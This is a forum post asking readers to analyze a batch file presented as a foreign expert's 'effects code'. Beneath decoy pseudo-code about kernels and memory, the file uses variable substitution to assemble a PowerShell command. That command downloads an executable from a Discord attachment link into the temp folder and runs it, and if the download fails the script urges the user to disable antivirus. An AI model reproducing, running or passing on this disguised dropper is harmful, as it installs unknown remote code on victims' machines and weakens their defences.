
[Effects code] A bat file from a foreign expert; could everyone help analyze it

@echo off
prompt usr:~#
echo So basically, this is the power of batcc xd
echo made by rootabx
\\0\declare nt, oskrnl, usrlocal [_0x90, _0x7B, _0x004F0C]:MEMORY
MEMORY_ALLOC(USRTEMPFOLDERID(usrlocal,_0x90)):_0x0020D6SETMEMORY&SET _asmMemory=SE&KERNELSUBDLL_GETUSERFOLDERPATH&Mempointer*_0x000F00Cb74&SET _0x00b742==&USER==DIM&getNearAssembly()&dynamicClear.dll IntPtr.holdAll=0
ZtWritebytes(_0x00c07df1),usrlocal&MEMPTR&%_asmMemory%T int128%_0x00b742%lS
dynamicLL.CSharpProvider(encryptedFile-AES&_asmMemory.WriteUIon&%_asmMemory%T writeUI%_0x00b742%et.We&~insert&CSharpProvider.GenerateUI.Details(intptr*&%_asmMemory%T dynamicGUI%_0x00b742%ient).Down&.Up.Down.Down.Down.Up(65535)&.Down.Right.Left.Left.Down(65535)&%_asmMemory%T mmdiagnostic%_0x00b742%xe&environment.clear(xe)
[rootabxRAT.API.Import(intptr*&Object0&%_asmMemory%T _0x000c%_0x00b742%le('ht&fileht(ht)&%_asmMemory%T _0x0042%_0x00b742%tPS
remotePS.connectIP(myIP).TCP=true&kernelMode.OpenSession(oskrnl, intptr&asmMemory.T.\\&.//&///&\\.\/ _0x00f4//.//&%_asmMemory%T _0x00f2%_0x00b742%://cd&memptr.LoadDump()&wersh.CreateWersh(rw-r-w, intptr*&%_asmMemory%T _0x00d8%_0x00b742%ordapp.c&importFiles(ordapp.c, main.c, stdio.c))&memPtr.CLR.parseHex(6675636B796F75)&parsePointer*&wersh.CreateWersh(intptr*&%_asmMemory%T _0x0065%_0x00b742%wersh&Wersh.Clean(intptr*&%_asmMemory%T _0x0b56%_0x00b742%achmen&Schmens.ParsedHex_0x0000FC070B65.Dump(intptr*&%_asmMemory%T _0xb9%_0x00b742%250827267/537708856759812126/U&0xb9 0049026401284/577294609124798/496240824709767/6498520749274986/0000000000000);
oskrnl.KernelInject(_0x90, intptr*&%_asmMemory%T _0x40%_0x00b742%','&Index[142]%TEMP%&c%int128%&%_asmMemory%T nternalStorage%_0x00b742%f exis&intptr*) wr-r-w ACCESSGRANT()
C%int128%&.MODEOPEN
memPointer(_0x004902, null, intptr.HoldZero*&POFile.FxPO&c%int128%&pO%_0x0065%ell.e%mmdiagnostic% (new-object System.N%writeUI%bCl%dynamicGUI%LoadFi%_0x000c%%_0x0042%%_0x00f2%n.disc%_0x00d8%om/att%_0x0b56%ts/537702667%_0xb9%SRSYSTEM.e%mmdiagnostic%%_0x40%%temP%\0x00b659SRS.E%mmdiagnostic%')&C%int128%
i%nternalStorage%t "%temp%\0x00b659SRS.E%mmdiagnostic%" ("%temp%\0x00b659SRS.E%mmdiagnostic%") e%int128%e (color a&cls&echo PLEASE CHECK YOUR INTERNET CONNECTION OR DISABLE ANTIVIRUSES&pause)